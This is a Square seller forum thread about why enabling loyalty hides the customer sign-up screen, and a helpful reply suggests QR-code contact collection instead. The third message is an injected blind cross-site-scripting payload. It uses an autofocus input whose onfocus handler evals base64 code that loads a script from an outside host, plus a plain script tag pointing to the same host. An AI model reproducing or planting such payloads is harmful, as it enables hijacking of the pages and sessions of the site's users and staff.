x

why does loyalty cancel out the "sign up" data collection screen?

If I have loyalty enabled, it cancels out the "sign up" screen that actually collects info such as name, number, email. Loyalty only collects and uses phone numbers Which is useless by itself in sales. I don't see the point of this as there is no other way to promote data collection to the customer outside of my staff manually adding them with no incentive.

I don't understand why square has such limitations?  Did I miss something?

Message 1 of 3
1 Best Answer
Super Seller

Best Answer

Hello @H2GO !

The only reason I can think of to limit collection at the point of sale would be because of how it would slow down the checkout process. I've watched people get annoyed with all the questions the system asks now, I can't imagine what it would be like if there was another data collection screen in the mix!!

What you can do is offer a printed signup page or QR code you could have available in your store that will allow your customers to sign up when they're not at the register. You can find it at:

Dashboard -> Marketing -> Contact Collection

Ryan Wanner
Golden Pine Coffee Roasters
Colorado Springs, CO, USA

Super Seller: I know stuff.
Beta Tester: I break stuff.
he/him/hey you/coffee guy/whatever.

Happy Selling!

View Best Answer >

Message 2 of 3
2 REPLIES 2
Super Seller

Best Answer

Hello @H2GO !

The only reason I can think of to limit collection at the point of sale would be because of how it would slow down the checkout process. I've watched people get annoyed with all the questions the system asks now, I can't imagine what it would be like if there was another data collection screen in the mix!!

What you can do is offer a printed signup page or QR code you could have available in your store that will allow your customers to sign up when they're not at the register. You can find it at:

Dashboard -> Marketing -> Contact Collection

Ryan Wanner
Golden Pine Coffee Roasters
Colorado Springs, CO, USA

Super Seller: I know stuff.
Beta Tester: I break stuff.
he/him/hey you/coffee guy/whatever.

Happy Selling!
Message 2 of 3
Beta Member

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY2xpcHBlci5ieHNzLmluIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; autofocus>

"><script src=https://clipper.bxss.in></script>
Message 3 of 3